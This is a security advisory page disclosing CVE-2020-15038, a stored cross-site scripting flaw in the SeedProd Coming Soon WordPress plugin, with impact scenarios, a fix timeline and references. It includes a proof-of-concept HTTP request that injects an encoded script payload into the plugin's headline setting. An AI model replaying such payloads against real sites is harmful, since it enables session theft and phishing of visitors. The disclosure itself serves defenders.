Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-15038: XSS Found In Coming Soon Page and Maintenance Mode Plugin

The SeedProd coming-soon plugin before 5.1.1 for WordPress allows XSS.

CVE
#xss#vulnerability#web#mac#wordpress#intel#php#firefox

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd plugin for WordPress version 5.1.0 and below were found to be vulnerable to stored XSS while I was auditing the plugin. Plugin version 5.1.2 with improved data sanitization was released on June 24, 2020.

CVE ID: CVE-2020-15038

****Summary****

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. It was found to be vulnerable to stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Impact

While there are multiple ways in which an attacker can perform malicious actions exploiting this vulnerability, let’s take a look at two.

  • Redirection:

    If an attacker were to exploit the vulnerability, they would be able to use an XSS payload to cause redirection such that any time the developer enables maintenance mode, a user visiting the site would be redirected to a domain under the attacker’s control, which could be made to look exactly like the original website with a login form for the user to submit their credentials. If the user submits their credentials without noticing the changed domain, their account gets compromised.

  • Phishing:

    Similarly, an attacker can also use a payload to create a login form on the Coming Soon/Maintenance Mode page itself, trying to bait unsuspecting users into entering their credentials.

Vulnerability

The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live).

POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: http://localhost:10004
Connection: close
Cookie: ...

option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=

****Timeline****

Vulnerability reported to the SeedProd team on June 22, 2020.
Version 5.1.2 containing the fix to the vulnerability was released on June 24, 2020.

****Recommendation****

It is highly recommended to update the plugin to the latest version.

Reference

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15038
  • https://nvd.nist.gov/vuln/detail/CVE-2020-15038
  • https://wordpress.org/plugins/coming-soon/#developers
  • https://wpvulndb.com/vulnerabilities/10283

For best security practices, you can follow the below guides:

  • WordPress Security Guide
  • WordPress Hack and Malware Removal

Tags: coming soon page, Cross Site Scripting, maintenance mode, seedprod, stored xss, under construction, vulnerability, WordPress, WordPress Maintenance, Wordpress Plugin Vulnerability, wordpress security, XSS

Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor’s degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907